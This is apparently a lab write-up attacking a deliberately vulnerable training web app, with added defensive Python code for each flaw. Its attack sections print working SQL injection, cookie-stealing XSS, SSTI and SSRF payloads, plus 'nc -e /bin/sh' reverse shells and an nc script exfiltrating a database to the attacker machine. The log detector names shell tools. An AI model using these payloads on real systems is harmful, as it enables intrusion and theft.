
Victim IP: 10.0.2.18

Queries button
Possible Attack Vector:

Login page

# 1
Method 1 (Shown in class):

`'OR 1=1 --`

No knowledge of the accounts is necessary: the quote closes the string, `1=1` always evaluates to true, and `--` comments out the rest of the query, so the login always succeeds.
Method 2:
`'UNION SELECT 'alice', 'password', 'alice@alice.com' --`


Note that we would need to have some knowledge of what the usernames can be.
Method 3:


`' OR 9090--`
Closes the previous statement and comments out the rest of the query. A non-zero integer is evaluated as true, which allows the login.
Note: the input string should be sanitised in order to create a more secure environment.
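The three payloads above all work for the same reason: the username is pasted into the SQL text, so its quotes and `--` become part of the query. As an added example (not code from the writeup or the lab application; the `users` table and the selected columns are constructed to match the UNION payload), the following contrasts that string-formatted query with a parameterised one on an in-memory SQLite database and runs the writeup's payloads through both:

```python
import sqlite3

# Constructed stand-in for the lab application's users table (not the real schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, email TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret', 'alice@alice.com')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """Builds the SQL by string formatting, so quotes, OR, UNION and -- in the
    input change the structure of the query instead of being compared as data."""
    query = (
        f"SELECT username, password, email FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Uses ? placeholders: the driver sends the input as bound values and the
    database never parses them as SQL, whatever characters they contain."""
    row = conn.execute(
        "SELECT username, password, email FROM users "
        "WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

# The three payloads from the writeup, used as the username with a junk password.
PAYLOADS = [
    "'OR 1=1 --",
    "'UNION SELECT 'alice', 'password', 'alice@alice.com' --",
    "' OR 9090--",
]

def compare(conn):
    """Returns {payload: (result of vulnerable login, result of safe login)}."""
    return {p: (login_vulnerable(conn, p, "x"), login_safe(conn, p, "x")) for p in PAYLOADS}

if __name__ == "__main__":
    for payload, (vuln, safe) in compare(make_db()).items():
        print(f"{payload!r:60} vulnerable -> {vuln!r:8} safe -> {safe!r}")
```

Every payload logs in as `alice` through `login_vulnerable` and returns `None` through `login_safe`; the safe version still accepts the real credentials. Sanitising characters is a weaker fallback, since the set of dangerous characters depends on the database and on where in the query the value lands.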
# 2
Using Burp Suite, we can brute-force the password of the `Admin` user with the given `credentials.txt` wordlist.




Using the found username and password, we can log in as admin to carry out the exploit.
## Blind SQL Injection
In the URL `http://10.0.2.18/posts/1 order by XX`
Tried with 10 and this is the result:

We know that only 1-6 work, i.e. the query has 6 columns:
Now we can list the available table names, excluding SQLite's internal `sqlite_%` tables:
`http://10.0.2.18/posts/1 Union SELECT 1,2,3,4,5,6 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'`

When we change the order, `http://10.0.2.18/posts/1 Union SELECT 3,2,1,4,5,6 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'`, this is what we get:

We did this to find out which column is displayed where on the page.
To see the table details:
`http://10.0.2.18/posts/1 Union SELECT 1,sql,3,4,5,6 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'`


To find the username and password information:
`http://10.0.2.18/posts/1 Union SELECT 1,username,password,4,5,6 from users`

We can see that the information is displayed on the website.
## Persistent XSS Attack
At this point, the bug bounty machine was restarted:

`<script>var i=new Image;i.src="http://10.0.2.18/news?text="+document.cookie;</script>`

Whenever the Admin posts something, the cookie is posted to the news list.
```
Admin says: pin=2010; session=.eJyrVopPy0kszkgtVrKKrlZSKAFSSrmpxcWJ6alKOkoemZeQrBpcnJQCFFpdjaWB2l0uLUIiUrmFrHlNzMPKBKCB1bWwsAWugakw.F4m3cA.PpBrKM4xJq4TwmsVQmQxiqPkKsM
```
## Reflected XSS Attack
`http://10.0.2.18/search?u=<script>window.location=" http://10.0.2.18/news?text= " + document.cookie</script>`

The script redirects the victim's browser to the website's news tab, posting the cookie there.




It is possible to defend against XSS attacks if the following are followed:
• Input validation should be carried out on all inputs to remove malicious commands.
• Filtering of keywords from input, for example `<script></script>` or `' 1=1 --`, etc. If you are using Python, SQLAlchemy would be a good place to start for this.
• Encoding of user input so that it is treated as data, not code.
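The third bullet (encoding) is the one that actually stops both the persistent and the reflected payload above, because the browser then sees text rather than a script tag. As an added example (not code from the writeup or the lab application; the HTML fragment and the cookie flags are assumptions about the app), this shows a news item rendered with and without HTML encoding, plus a `Set-Cookie` header with `HttpOnly` so that `document.cookie` no longer exposes the session even if a script does run:

```python
import html
from http.cookies import SimpleCookie

# The stored-XSS payload from the writeup, used here only as a constructed test input.
PAYLOAD = '<script>var i=new Image;i.src="http://10.0.2.18/news?text="+document.cookie;</script>'

def render_news_item_vulnerable(author, text):
    """Concatenates user text straight into the HTML: a <script> tag in the
    text runs in the browser of everyone who views the news list."""
    return f"<li>{author} says: {text}</li>"

def render_news_item_safe(author, text):
    """Encodes the text for an HTML context (<, >, &, quotes become entities),
    so the browser displays the payload as text instead of executing it."""
    return f"<li>{html.escape(author)} says: {html.escape(text)}</li>"

def session_cookie_header(session_value):
    """Set-Cookie header for the session with HttpOnly (not readable from
    document.cookie, so the exfiltration in the payload gets nothing),
    Secure and SameSite=Lax. The flag set is an assumption about the app."""
    cookie = SimpleCookie()
    cookie["session"] = session_value
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Lax"
    return cookie.output(header="Set-Cookie:").strip()

if __name__ == "__main__":
    print(render_news_item_vulnerable("Admin", PAYLOAD))
    print(render_news_item_safe("Admin", PAYLOAD))
    print(session_cookie_header("constructed-session-value"))
```

Encoding must match the context the value lands in (HTML body here; attributes, JavaScript strings and URLs each need their own encoder), which is why a template engine with auto-escaping on is the usual way to get this right everywhere. Keyword filtering alone is easy to bypass with alternative tags or encodings, so it belongs behind encoding, not in front of it.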
## Remote Code Injection

`| nc -e /bin/sh 10.0.2.18 8080` --> which is run in the search bar `http://10.0.2.18/website?u=|%20nc%20-e%20/bin/sh%2010.0.2.15%208080`

`ls` --> which is run on the search bar : `http://10.0.2.18/website?u=|ls`


`cat secrets` --> which is run on the search bar `http://10.0.2.18/website?u=|cat secrets`
The command `| nc -e /bin/sh 10.0.2.18 8080` was injected into the URL after opening a listener to wait for incoming connections (victims). Once a victim connects, all of its input/output is redirected to the attacker, giving the attacker remote access.
## Insecure Design
Session Cookie : `eyJ1c2VyIjp7IiB0IjpbIkFkbWluIiwiQWRtaW4iXX19.F4m76A.4Bk-VJsqi2J6rumWb9tsu8uAKuw`



While the request is being sent, the ID and the session cookie are modified.


This allows the Alice user to edit as Admin:


This allows Alice to log in as Admin and edit the welcome page.
Establishing continuous unit and integration tests will prevent insecure design vulnerabilities.
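Two things have to hold for the edit above to fail: the server must detect that the cookie payload was changed, and the edit permission must be decided from server-side state rather than from the ID the client sends. As an added example (not code from the writeup or the lab application; the signing scheme is a simplified HMAC-SHA256 cookie rather than the app's real session format, and the secret and role table are constructed), this shows both checks, with a small test of the kind the last sentence recommends:

```python
import base64
import hashlib
import hmac
import json

# Constructed server-side secret; a real deployment loads it from configuration.
SECRET_KEY = b"constructed-demo-secret-do-not-reuse"

# Constructed role table kept on the server; the cookie never carries the role.
ROLES = {"Admin": "admin", "Alice": "user"}

def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_session(data: dict) -> str:
    """payload.signature, the signature being an HMAC-SHA256 over the payload.
    (Simplified version of the signed-cookie idea; not Flask's exact format.)"""
    payload = _b64(json.dumps(data, sort_keys=True).encode())
    sig = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).digest()
    return f"{payload}.{_b64(sig)}"

def load_session(cookie: str):
    """Returns the session dict, or None if the cookie is malformed or its
    signature does not match the payload (i.e. the payload was edited)."""
    if "." not in cookie:
        return None
    payload, sig = cookie.split(".", 1)
    expected = _b64(hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(expected, sig):
        return None
    try:
        return json.loads(_unb64(payload))
    except (ValueError, UnicodeDecodeError):
        return None

def rewrite_payload(cookie: str, **changes) -> str:
    """Reproduces the edit-in-transit from the writeup: change fields in the
    decoded payload and keep the old signature."""
    payload, sig = cookie.split(".", 1)
    data = json.loads(_unb64(payload))
    data.update(changes)
    return f"{_b64(json.dumps(data, sort_keys=True).encode())}.{sig}"

def can_edit_welcome_page(cookie: str) -> bool:
    """Authorization decided on the server from the verified user name and the
    server-side role table, never from an ID or role field the client sent."""
    session = load_session(cookie)
    if session is None:
        return False
    return ROLES.get(session.get("user")) == "admin"

def test_alice_cannot_become_admin():
    """The kind of integration test the writeup recommends: an edited cookie
    must be rejected and a genuine non-admin session must not be able to edit."""
    alice = sign_session({"user": "Alice", "id": 2})
    assert not can_edit_welcome_page(alice)
    assert load_session(rewrite_payload(alice, user="Admin", id=1)) is None
    assert can_edit_welcome_page(sign_session({"user": "Admin", "id": 1}))
    return True

if __name__ == "__main__":
    print("authorization test passed:", test_alice_cannot_become_admin())
```

The signature check stops the cookie edit; the role lookup stops the simpler case where the client merely sends a different ID in the request body. Both belong in the test suite so that a later refactor cannot silently drop either one.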

## Vulnerability Scanning (Nikto)
`nikto -h http://10.0.2.18`

This tool is useful in identifying multiple vulnerabilities such as
- XSS
- X-Content-Type-Options
- No CGI directories found
## Bounty Points

### SSTI (Server Side Template Injection) A03:2021-Injection
A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. We can use it to list and read files on the machine.
To display the folders in root:
`{{ "foo".__class__.__base__.__subclasses__()[182].__init__.__globals__['sys'].modules['os'].popen("ls").read()}}`


To open the file:
`{{ "foo".__class__.__base__.__subclasses__()[182].__init__.__globals__['sys'].modules['os'].popen("cat /root/secrets").read()}}`


This bug exposes the server-side secret; good input sanitisation can prevent this attack.
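The root cause is that user text is compiled as a template, so `{{ ... }}` inside it is evaluated. The reliable fix is to keep templates fixed and pass user text in as a variable; sanitising braces is fragile. As an added example (not code from the writeup or the lab application; it assumes the Jinja2 library, which the `__class__`/`__subclasses__` payload style targets), this shows the vulnerable pattern next to the fixed-template pattern and, as defence in depth, Jinja2's sandbox, which blocks the underscore-attribute walk the payload relies on:

```python
from jinja2 import Environment, BaseLoader
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# The SSTI payload from the writeup, used only as a constructed input to the
# safe renderers below; render_vulnerable() is never called with it here.
PAYLOAD = ("{{ \"foo\".__class__.__base__.__subclasses__()[182].__init__"
           ".__globals__['sys'].modules['os'].popen(\"ls\").read()}}")

def render_vulnerable(user_text):
    """Treats the user's text as the template source. {{ ... }} in the input is
    evaluated by the template engine, which is what SSTI is."""
    return Environment(loader=BaseLoader()).from_string(user_text).render()

def render_safe(user_text):
    """Fixed template written by the developer; user text is passed in as a
    variable, so braces in it are just characters. autoescape also encodes
    < > & and quotes for the HTML context."""
    env = Environment(loader=BaseLoader(), autoescape=True)
    return env.from_string("<p>{{ text }}</p>").render(text=user_text)

def render_sandboxed(user_text):
    """Defence in depth if user-controlled template source cannot be avoided:
    the sandbox refuses attribute access that starts with an underscore, so the
    __class__ walk in the payload raises SecurityError. Returns None when blocked."""
    try:
        return SandboxedEnvironment().from_string(user_text).render()
    except SecurityError:
        return None

if __name__ == "__main__":
    print("vulnerable, harmless probe {{ 7 * 7 }}:", render_vulnerable("{{ 7 * 7 }}"))
    print("safe, same probe:", render_safe("{{ 7 * 7 }}"))
    print("safe, payload:", render_safe(PAYLOAD)[:60], "...")
    print("sandboxed, payload:", render_sandboxed(PAYLOAD))
```

`{{ 7 * 7 }}` rendering as `49` is the usual sign that input is being compiled as a template; through `render_safe` it comes back unchanged. The sandbox is a second layer only: it narrows what a template can reach, but the fixed-template design is what removes the problem.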
### Server-side request forgery (SSRF) A10:2021-Server-Side Request Forgery
We can do this by using the Burp Suite Repeater:


We can change the request from `http://10.0.2.18/static/js/bootstrap.js` to `file:////etc/shadow` in order to forge a request that reads the `shadow` file on the machine.

Testing directly in the browser:

Adding `file:///etc/shadow` at the end of the URL allows an attacker to access files on the local system or within the internal network. By disabling unused URL schemes, an attacker will not be able to use the web application to make such requests.
This bug exposes secrets on the server machine; proper sanitisation can prevent it.
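"Disabling unused URL schemes" is best done as an allowlist on the parsed URL before anything is fetched: only the schemes, hosts and paths the feature needs. As an added example (not code from the writeup or the lab application; the policy of only loading the app's own `/static/` assets from `10.0.2.18` is an assumption), this validates a fetch URL and, for features that must reach other hosts, checks whether the target address is internal:

```python
import ipaddress
import posixpath
from urllib.parse import urlsplit

# Constructed policy for a fetch-by-URL feature that should only ever load the
# app's own static assets: scheme, host and path prefix are all allowlisted.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"10.0.2.18"}
ALLOWED_PATH_PREFIX = "/static/"

def validate_fetch_url(url):
    """Returns (ok, reason). Rejects file:, gopher: and every other scheme,
    hosts outside the allowlist, embedded credentials, and paths that escape
    /static/ through '..' segments."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    if parts.hostname is None or parts.hostname.lower() not in ALLOWED_HOSTS:
        return False, f"host {parts.hostname!r} not allowed"
    path = posixpath.normpath(parts.path or "/")
    if not path.startswith(ALLOWED_PATH_PREFIX):
        return False, f"path {path!r} outside {ALLOWED_PATH_PREFIX}"
    return True, "ok"

def is_internal_address(host):
    """For features that must reach arbitrary hosts: block loopback, private,
    link-local (which includes the cloud metadata range), reserved and
    multicast targets. Resolve a hostname first and check the resolved address,
    since a name can point anywhere."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False   # not a literal address; the caller resolves and re-checks
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_reserved or addr.is_multicast)

if __name__ == "__main__":
    for url in ["http://10.0.2.18/static/js/bootstrap.js", "file:////etc/shadow",
                "http://10.0.2.18/static/../etc/passwd"]:
        print(f"{url:45} -> {validate_fetch_url(url)}")
    for host in ["127.0.0.1", "169.254.169.254", "8.8.8.8"]:
        print(f"{host:20} internal={is_internal_address(host)}")
```

The two checks serve different designs: a feature that only needs its own assets gets the strict allowlist (which is why the lab host itself is allowed there), while a feature that must fetch user-chosen URLs needs the address check applied to the resolved IP, plus no redirects followed without re-checking.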
### Reverse shell using shell script
Content of the shell script
```
nc -e /bin/sh 10.0.2.15 1234
```
`10.0.2.18/upload` is the way to upload items to `/images`
Files can be uploaded to `/static/uploads/`



Once uploaded, we can run the shell script via `/website`:


Reverse shell using uploaded file successful.
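The upload succeeds because nothing checks what is being uploaded or where it ends up, and the command-injection bug in `/website` then runs it. As an added example (not code from the writeup or the lab application; the allowed image types, size limit and the storage directory `/srv/app/uploads` are assumptions), this validates an upload by extension and content, stores it under a random name outside the web root with no execute bit, and rejects the shell script from this section whether or not it is renamed:

```python
import os
import secrets

# Constructed allowlist: extension -> leading bytes (magic numbers) the content must carry.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024
UPLOAD_DIR = "/srv/app/uploads"   # assumption: outside the web root, served only via the app

def _extension(filename):
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    return "jpg" if ext == "jpeg" else ext

def validate_upload(filename, data):
    """Returns (ok, reason). The extension alone is not trusted: the bytes must
    match the declared type, so a script renamed to .png is still rejected."""
    ext = _extension(filename)
    if ext not in ALLOWED_TYPES:
        return False, "extension not allowed"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    if not data.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    return True, "ok"

def safe_storage_name(filename):
    """Random name with the validated extension; the client's name (which may
    contain '../' or a second extension) never reaches the filesystem."""
    return f"{secrets.token_hex(16)}.{_extension(filename)}"

def store_upload(filename, data, upload_dir=UPLOAD_DIR):
    """Validates, then writes with O_EXCL (no overwrite) and mode 0o640 (no execute bit)."""
    ok, reason = validate_upload(filename, data)
    if not ok:
        raise ValueError(reason)
    os.makedirs(upload_dir, exist_ok=True)
    path = os.path.join(upload_dir, safe_storage_name(filename))
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path

if __name__ == "__main__":
    shell = b"nc -e /bin/sh 10.0.2.15 1234\n"   # the script from this section, as bytes
    print(validate_upload("reverse_shell.sh", shell))
    print(validate_upload("reverse_shell.png", shell))
    print(validate_upload("logo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
    print(safe_storage_name("../../website/logo.PNG"))
```

Magic-number checks are not a full parser, so for images a decode-and-re-encode step (for example with an image library) is the stronger version of the content check; the storage rules (random name, no execute bit, outside the web root) are what keep an uploaded file from ever being runnable even if validation is bypassed.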
### Security Misconfiguration
The goal is to get access to the password hashes.
First step is to register a new user: `Owen` with password: `1234` and PIN `1111`


Once done, we try to log in as Owen, and the hash of the password is revealed to the user:



Note that we need to make sure the cookie and the PIN are different from what we registered for the user `Owen`; this is a misconfiguration in the setup.
### Broken Access Control
Extending from the reverse shell vulnerability, we can send `mssd.db` to the attacker machine in order to gain access to the db file and see the hashed passwords.

Since we know that the file is stored in `/root/mssd.db`, we created a new bash script to upload and run so that the db file can be sent to the attacker machine.
Content of `send_file.sh`
```
#!/bin/bash
nc -w 3 10.0.2.15 1234 < /root/mssd.db
```


To accept `mssd.db` the following is the command to be run:
`nc -l -p 1234 > mssd.db`

We can then run `send_file.sh` from `/website`, just like `reverse_shell.sh`; this can also be done using the Burp Suite Repeater:


The content of the file is shown here:



Using this vulnerability (essentially allowing `nc` to send data out), we can see the users' private contents and other sensitive data.
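Every request in this writeup leaves a line in the web server's access log: the `ORDER BY` and `UNION SELECT` probes, the `<script>` payloads, the `|nc` and `|ls` searches, the template syntax, the `file:` URL, and the brute-force run of failed logins against `/login`. As an added example (not code from the writeup or the lab application; the log lines are constructed in Combined Log Format from the requests shown in this writeup, and the `/fetch` endpoint and the SSTI request are hypothetical so that every category has a sample), this is a small detector a defender could run over such a log to flag those patterns and the brute-force attempt from section 2:

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines modelled on the requests in this writeup.
# 10.0.2.15 is the attacker machine from the writeup; 10.0.2.99 is a
# constructed ordinary visitor whose lines must produce no findings.
SAMPLE_LOG = """\
10.0.2.15 - - [01/Jan/2024:10:00:01 +0000] "GET /posts/1%20order%20by%2010 HTTP/1.1" 500 0
10.0.2.15 - - [01/Jan/2024:10:00:02 +0000] "GET /posts/1%20Union%20SELECT%201,username,password,4,5,6%20from%20users HTTP/1.1" 200 1540
10.0.2.15 - - [01/Jan/2024:10:00:03 +0000] "GET /search?u=%3Cscript%3Ewindow.location=%22http://10.0.2.18/news?text=%22+document.cookie%3C/script%3E HTTP/1.1" 200 300
10.0.2.15 - - [01/Jan/2024:10:00:04 +0000] "GET /website?u=|%20nc%20-e%20/bin/sh%2010.0.2.15%208080 HTTP/1.1" 200 12
10.0.2.15 - - [01/Jan/2024:10:00:05 +0000] "GET /search?u=%7B%7B%20%22foo%22.__class__.__base__.__subclasses__()%20%7D%7D HTTP/1.1" 200 80
10.0.2.15 - - [01/Jan/2024:10:00:06 +0000] "GET /fetch?url=file:///etc/shadow HTTP/1.1" 200 1200
10.0.2.15 - - [01/Jan/2024:10:00:07 +0000] "POST /login HTTP/1.1" 401 0
10.0.2.15 - - [01/Jan/2024:10:00:07 +0000] "POST /login HTTP/1.1" 401 0
10.0.2.15 - - [01/Jan/2024:10:00:08 +0000] "POST /login HTTP/1.1" 401 0
10.0.2.15 - - [01/Jan/2024:10:00:08 +0000] "POST /login HTTP/1.1" 401 0
10.0.2.15 - - [01/Jan/2024:10:00:09 +0000] "POST /login HTTP/1.1" 401 0
10.0.2.15 - - [01/Jan/2024:10:00:09 +0000] "POST /login HTTP/1.1" 200 0
10.0.2.99 - - [01/Jan/2024:10:00:10 +0000] "GET /posts/1 HTTP/1.1" 200 900
10.0.2.99 - - [01/Jan/2024:10:00:11 +0000] "GET /static/js/bootstrap.js HTTP/1.1" 200 58072
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Each signature is applied to the URL-decoded request path (query string included).
SIGNATURES = [
    ("sqli", re.compile(r"union\s+select|order\s+by\s+\d+|sqlite_master|'\s*or\s+\d", re.I)),
    ("xss", re.compile(r"<\s*script|javascript:|onerror\s*=|onload\s*=", re.I)),
    ("cmd_injection", re.compile(r"[|;`]\s*(nc|sh|bash|cat|ls|wget|curl)\b", re.I)),
    ("ssti", re.compile(r"\{\{.*(__class__|__globals__|popen)", re.I)),
    ("ssrf", re.compile(r"\b(file|gopher|dict):/", re.I)),
]

def parse_line(line):
    """Returns a dict with ip, method, path, status (int) and decoded_path, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["decoded_path"] = unquote_plus(rec["path"])   # decode before matching: %20, %3C, + ...
    return rec

def analyze(log_text, brute_threshold=5):
    """Returns {'findings': [(ip, category, decoded_path), ...],
                'brute_force': {ip: failed_login_count}} for IPs at or above the threshold."""
    findings = []
    failed_logins = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for category, pattern in SIGNATURES:
            if pattern.search(rec["decoded_path"]):
                findings.append((rec["ip"], category, rec["decoded_path"]))
        if rec["method"] == "POST" and rec["decoded_path"].startswith("/login") \
                and rec["status"] in (401, 403):
            failed_logins[rec["ip"]] += 1
    brute = {ip: n for ip, n in failed_logins.items() if n >= brute_threshold}
    return {"findings": findings, "brute_force": brute}

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for ip, category, path in report["findings"]:
        print(f"{ip:12} {category:14} {path}")
    for ip, n in report["brute_force"].items():
        print(f"{ip:12} brute_force    {n} failed logins")
```

Decoding before matching matters because the injected commands arrive as `%20nc%20-e` and the script tags as `%3Cscript%3E`. The signatures are deliberately narrow to keep false positives low on normal traffic (the visitor's `/posts/1` and `/static/js/bootstrap.js` lines produce nothing); the failed-login count needs a time window in production rather than a whole-file total, and the `401` after a `200` from the same address is exactly the sequence the brute-force section produced.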